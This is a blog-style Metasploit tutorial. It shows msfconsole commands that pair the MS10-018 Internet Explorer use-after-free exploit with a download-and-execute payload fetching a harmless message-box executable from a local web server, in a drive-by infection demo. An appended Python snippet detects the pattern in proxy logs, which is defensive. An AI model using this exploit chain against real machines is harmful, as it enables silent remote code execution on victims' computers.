Brief introduction to Metasploit
As a part of increasing IT-infrastructure security, penetration testing is one of the most valuable tools. Of course, system updates, using firewalls, IDS/IPS, right ACL and other methods are very efficient, but you can't be 100% assured that everything is fine. Security is a battle between defenders and attackers, and usually attackers are one step ahead in this battle.
To be a good security professional, you have to know how attackers work and which tools and methods they use; you have to be an attacker yourself (a white-hat one, of course): embrace the Dark Side, but do not be dominated by it, and stay with the Light Side.
So Metasploit is one of the must-know tools for every security professional:
Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information are provided for legal security research and testing purposes only. There is a lot of information about Metasploit on the Internet, and I strongly recommend reading Metasploit Unleashed. Here I only want to briefly show its usage.
Download the Metasploit Framework: http://www.metasploit.com/framework/download/
No additional packages are required. Ruby and RoR are included in the installer.
The main tool you will use is the console, msfconsole. Please note that if you've selected autoupdate from SVN, the console launch time can be pretty long (the autoupdate runs during console startup).
The main principle of Metasploit usage:
- select the exploit which will be used to breach the system;
- select the payload which will be executed after breaking in;
- set up additional parameters if needed and exploit the target.
We will use the windows/browser/ms10_018_ie_behaviors exploit and the windows/download_exec payload. Before that, prepare the Windows executable and upload it to the web server. I recommend building the executable via cross-compilation and using SimpleHTTPServer to serve it.
Example executable source code:
#include <windows.h>

/* Minimal GUI program built with MinGW: it only shows a message box and exits,
   which makes it a harmless marker that the payload ran. */
INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                   LPSTR lpCmdLine, int nCmdShow)
{
    MessageBoxW(0, L"You're pwned!\n", L"MinGW app", MB_ICONEXCLAMATION);
    return 0;
}
Compile it and start a web server:
$ i586-mingw32msvc-cc msgbox.c -o msgbox.exe -Wl,-subsystem,windows
$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Now it's time to start msfconsole:
$ msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.5.0-dev [core:3.5 api:1.0]
+ -- --=[ 609 exploits - 306 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r10702 updated today (2010.10.16)
msf >
You've got an MSF prompt. Let's get information about the required exploit and payload:
msf > info windows/browser/ms10_018_ie_behaviors
Name: Internet Explorer DHTML Behaviors Use After Free
Version: 9787
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Good
Provided by:
unknown
Trancer <mtrancer@gmail.com>
Nanika
jduck <jduck@metasploit.com>
Available targets:
  Id  Name
  --  ----
  0   (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista
  1   IE 6 SP0-SP2 (onclick)
  2   IE 7.0 (marquee)
Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)
Payload information:
Space: 1024
Avoid: 6 characters
Description:
This module exploits a use-after-free vulnerability within the DHTML
behaviors functionality of Microsoft Internet Explorer versions 6
and 7. This bug was discovered being used in-the-wild and was
previously known as the "iepeers" vulnerability. The name comes from
Microsoft's suggested workaround to block access to the iepeers.dll
file. According to Nico Waisman, "The bug itself is when trying to
persist an object using the setAttribute, which end up calling
VariantChangeTypeEx with both the source and the destination being
the same variant. So if you send as a variant an IDISPATCH the
algorithm will try to do a VariantClear of the destination before
using it. This will end up on a call to PlainRelease which deref the
reference and clean the object." NOTE: Internet Explorer 8 and
Internet Explorer 5 are not affected.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-0806
http://www.osvdb.org/62810
http://www.securityfocus.com/bid/38615
http://www.microsoft.com/technet/security/advisory/981374.mspx
http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/
http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html
http://www.microsoft.com/technet/security/bulletin/MS10-018.mspx
msf > info windows/download_exec
Name: Windows Executable Download and Execute
Version: 9488
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 340
Rank: Normal
Provided by:
lion <lion@cnhonker.com>
pita <pita@mail.com>
Basic options:
  Name  Current Setting  Required  Description
  ----  ---------------  --------  -----------
  URL                    yes       The pre-encoded URL to the executable
Description:
Download an EXE from an HTTP URL and execute it
As you can see, the exploit targets are unpatched IE 6 and IE 7.
It's time to get some action:
msf > use windows/browser/ms10_018_ie_behaviors
msf exploit(ms10_018_ie_behaviors) > set payload windows/download_exec
payload => windows/download_exec
msf exploit(ms10_018_ie_behaviors) > set URL "http://192.168.1.4:8000/msgbox.exe"
URL => http://192.168.1.4:8000/msgbox.exe
msf exploit(ms10_018_ie_behaviors) > exploit
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8080/minSVGSK
[*] Local IP: http://192.168.1.4:8080/minSVGSK
[*] Server started.
Now let's open this URL in an unpatched Windows XP. After some hidden actions the required application starts without any confirmation:
This is a classic drive-by-download malware infection.
I hope that this article gives you the initial pointers to increase your knowledge in security. MSF is a great tool, and every security researcher has to know it. There are many topics left undiscovered, but I'm sure that you can find all the required information on the Internet or by examining the MSF source code. Good luck, and may the Force be with you!
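What a defender sees of this sequence in a web proxy log is a page load followed within seconds by a Windows executable fetched from a different origin (here the exploit page on port 8080, then msgbox.exe from port 8000). The following added example, which is not part of the original post, correlates exactly that pattern per client; the log format and the sample lines are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed proxy log (not real traffic): timestamp, client, method, URL, response content type.
SAMPLE_LOG = """\
2010-10-16T10:00:01 10.0.0.7 GET http://192.168.1.4:8080/minSVGSK text/html
2010-10-16T10:00:03 10.0.0.7 GET http://192.168.1.4:8000/msgbox.exe application/x-msdownload
2010-10-16T10:05:00 10.0.0.9 GET http://intranet.example/index.html text/html
2010-10-16T10:30:00 10.0.0.9 GET http://downloads.example/setup.exe application/x-msdownload
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")


def parse_log(text):
    """Turn the constructed log format into a list of event dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, _method, url, ctype = m.groups()
        events.append({"ts": datetime.fromisoformat(ts), "client": client, "url": url, "ctype": ctype})
    return events


def origin_of(url):
    """scheme://host:port/path -> host:port (the port matters: 8080 and 8000 are different origins)."""
    return url.split("/", 3)[2]


def find_drive_by(events, window_seconds=10):
    """Flag (client, page_url, exe_url) where a client loaded an HTML page and, within
    window_seconds, pulled a Windows executable from another origin. This is a heuristic:
    a legitimate cross-origin download is possible, so treat hits as leads to triage."""
    hits, by_client = [], {}
    for e in events:
        by_client.setdefault(e["client"], []).append(e)
    for client, evs in by_client.items():
        evs.sort(key=lambda ev: ev["ts"])
        for i, page in enumerate(evs):
            if page["ctype"] != "text/html":
                continue
            for nxt in evs[i + 1:]:
                if nxt["ts"] - page["ts"] > timedelta(seconds=window_seconds):
                    break  # sorted by time, so nothing later can fall in the window
                is_exe = nxt["ctype"] == "application/x-msdownload" or nxt["url"].lower().endswith(".exe")
                if is_exe and origin_of(nxt["url"]) != origin_of(page["url"]):
                    hits.append((client, page["url"], nxt["url"]))
    return hits
```

The second client in the sample downloads an executable as well, but 25 minutes after its page load, so it stays outside the window and is not reported.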